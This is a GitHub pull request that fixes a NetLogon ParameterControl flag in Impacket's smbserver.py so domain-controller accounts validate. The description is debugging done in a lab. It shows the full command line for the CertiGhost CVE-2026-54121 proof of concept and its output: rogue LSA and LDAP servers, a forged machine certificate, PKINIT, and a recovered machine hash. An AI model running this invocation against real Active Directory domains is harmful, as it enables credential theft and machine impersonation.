### PR TITLE
smbserver.py: allow server-trust accounts in NetLogon validation

### DIFF
--- a/impacket/smbserver.py
+++ b/impacket/smbserver.py
@@ -5386,9 +5386,10 @@ class NetLogon:
         request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
         request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = authenticateMessage['domain_name'].decode('utf-16le')
 
-        # MS-APDS: 3.1.5.2 NTLM Network Logon: If the account is a computer account, the subauthentication package is not verified, and the K bit of LogonInformation.LogonNetwork.Identity.ParameterControl is not set, then return STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT.<21>
-        # MS-NRPC: 2.2.1.4.15 NETLOGON_LOGON_IDENTITY_INFO: K=20
-        request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 2**11
+        # MS-APDS 3.1.5.2 and MS-NRPC 2.2.1.4.15: K (0x800) allows
+        # computer accounts; E (0x20) also allows domain controller computer
+        # accounts, otherwise validation returns STATUS_NOLOGON_SERVER_TRUST_ACCOUNT.
+        request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0x800 | 0x20
         request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authenticateMessage['user_name'].decode('utf-16le')
         request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = ''
 


### PR DESCRIPTION
While playing with the [CertiGhost PoC for CVE-2026-54121](https://github.com/GregDurys/CVE-2026-54121) in a lab with a Windows Server 2022 Domain Controller, a Windows Server 2016 domain functional level and an AD CS Enterprise CA installed on the Domain Controller, it kept failing.


```console
$ sudo /home/kali/git/pr/CVE-2026-54121/.venv/bin/python \
  /home/kali/git/certighost-public-validation/certighost.py \
  -d ludus.domain \
  -u domainuser \
  -p password \
  --dc-ip 10.2.10.11 \
  --computer-name 'ment4t-ws1$' \
  --computer-hash '<REDACTED_NT_HASH>' \
  --target-san 'MENT4T-WS2$' \
  --listener 10.2.99.1
[*] Connecting to LDAPS
[*] Detecting infrastructure
    DC: 10.2.10.11 | CA: ludus-CA (10.2.10.11)
    Target: MENT4T-WS2$ | SID: S-1-5-21-1399539159-2962312790-4236568506-1107
[*] Using existing computer: ment4t-ws1$
[*] Starting rogue servers (LSA:445 + LDAP:389)
[*] Requesting certificate (template=Machine, cdc=10.2.99.1)
Traceback (most recent call last):
  File "/home/kali/git/pr/CVE-2026-54121/.venv/lib/python3.13/site-packages/impacket/smbserver.py", line 4191, in handle
    resp = self.__SMB.processRequest(self.__connId, p.get_trailer())
  File "/home/kali/git/pr/CVE-2026-54121/.venv/lib/python3.13/site-packages/impacket/smbserver.py", line 4782, in processRequest
    respCommands, respPackets, errorCode = self.__smb2Commands[packet['Command']](
                                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^
        connId,
        ^^^^^^^
        self,
        ^^^^^
        packet)
        ^^^^^^^
  File "/home/kali/git/pr/CVE-2026-54121/.venv/lib/python3.13/site-packages/impacket/smbserver.py", line 3254, in smb2SessionSetup
    respSMBCommand, errorCode = SMB2Commands._ntlm_auth(token, connData, smbServer, rawNTLM)
                                ~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/git/pr/CVE-2026-54121/.venv/lib/python3.13/site-packages/impacket/smbserver.py", line 3109, in _ntlm_auth
    sessionKey, errorCode = netlogon.logonUserAndGetSessionKey(authenticateMessage, smbServer.getSMBChallenge())
                            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/git/pr/CVE-2026-54121/.venv/lib/python3.13/site-packages/impacket/smbserver.py", line 5404, in logonUserAndGetSessionKey
    resp = self.dce.request(request)
  File "/home/kali/git/pr/CVE-2026-54121/.venv/lib/python3.13/site-packages/impacket/dcerpc/v5/rpcrt.py", line 1436, in request
    raise exception
impacket.dcerpc.v5.nrpc.DCERPCSessionError: NRPC SessionError: code: 0xc000019a - STATUS_NOLOGON_SERVER_TRUST_ACCOUNT - The account used is a server trust account. Use your global user account or local user account to access this server.
```
(A workstation is used as the target to avoid an unrelated PKINIT naming issue caused by the lab DC's hostname exceeding 15 characters; the CA retried the SMB callback several times, with repeated output trimmed for brevity.)

CertiGhost eventually reported the generic CA error:

```text
[!] Failed: Cert request denied (0x800706ba): Denied by Policy Module
```

At first, the `0x800706ba` response looked like an AD CS or RPC failure, but this was only the CA's wrapper for a failure during the SMB callback.

Because AD CS and the Domain Controller were running on the same server, Windows authenticated the callback using the DC computer account. Impacket then passed that authentication to Netlogon with only the K bit set. K allows ordinary computer accounts but not Domain Controller server-trust accounts, so Netlogon returned `STATUS_NOLOGON_SERVER_TRUST_ACCOUNT`.

I traced the failure to `NetLogon.logonUserAndGetSessionKey` in [`impacket/smbserver.py`, line 5391](https://github.com/fortra/impacket/blob/df6a18adcaf7a11138a25d70f94cbe15824cf3b1/impacket/smbserver.py#L5391). The NetLogon request currently sets:

```python
request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 2**11
```

`2**11` sets K (`0x800`) but does not set E (`0x20`), which is the bit required to allow a Domain Controller account.

The fix is to set both bits:

```python
request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0x800 | 0x20
```

I then re-ran the PoC using the virtual environment containing the patched Impacket:

```console
$ sudo /home/kali/git/certighost-public-validation/.venv/bin/python \
  /home/kali/git/certighost-public-validation/certighost.py \
  -d ludus.domain \
  -u domainuser \
  -p password \
  --dc-ip 10.2.10.11 \
  --computer-name 'ment4t-ws1$' \
  --computer-hash '<REDACTED_NT_HASH>' \
  --target-san 'MENT4T-WS2$' \
  --listener 10.2.99.1
[*] Connecting to LDAPS
[*] Detecting infrastructure
    DC: 10.2.10.11 | CA: ludus-CA (10.2.10.11)
    Target: MENT4T-WS2$ | SID: S-1-5-21-1399539159-2962312790-4236568506-1107
[*] Using existing computer: ment4t-ws1$
[*] Starting rogue servers (LSA:445 + LDAP:389)
[*] Requesting certificate (template=Machine, cdc=10.2.99.1)
    Saved: ment4t-ws2.pfx
[*] PKINIT as MENT4T-WS2$
[*] Got hash for MENT4T-WS2$:
    MENT4T-WS2$:<REDACTED_LM_HASH>:<REDACTED_NT_HASH>
    ccache: ment4t-ws2.ccache
[*] GGWP
```

Microsoft defines these flags in [MS-NRPC section 2.2.1.4.15](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/81c44fa0-0a27-41b3-b607-de39cce7ea1d): K allows validation with a computer account, while E allows validation with a Domain Controller account. [MS-APDS section 3.1.5.2](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-apds/a6969cdd-5441-4cf9-bcaa-4b7ffbf792b7) describes the corresponding workstation-trust and server-trust errors.

The NetLogon-backed SMB signing code was introduced in [Impacket PR #1975](https://github.com/fortra/impacket/pull/1975). The K-only value first appeared in its commit [`Fix signed computer account authentication in NetLogon`](https://github.com/fortra/impacket/commit/ef2e9f4e7942e843439f53534570e46727994873), and the PR was later [squash-merged into master](https://github.com/fortra/impacket/commit/d7a0d57560e20600a3d62bc8bb04b6d2a96aa81f).

That implementation was based on a [NetLogon technique published by ThePirateWhoSmellsOfSunflowers](https://gist.github.com/ThePirateWhoSmellsOfSunflowers/f41c334f912ec033d9bbfc7e96308ec6).

The original technique uses `ParameterControl` value `0x2ae0`, which already contains both K (`0x800`) and E (`0x20`). When the technique was adapted for Impacket, K was carried over but E was not.

This change does not copy the complete `0x2ae0` mask. It retains K and adds only E, producing `0x820`. The other flags in `0x2ae0` control unrelated logon behavior and are not required to validate workstation or Domain Controller computer accounts.

The change is limited to the NetLogon pass-through path used when computer-account credentials are configured through `setComputerAccount` or `setComputerAccountCredentials`. K remains set, so workstation and member-server account validation remains supported. The credential and NTLM challenge-response checks are unchanged.

CertiGhost references:

https://github.com/aniqfakhrul/CVE-2026-54121

https://gist.github.com/H0j3n/a5ef2609b5f2944ac2390a191a534c26

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54121
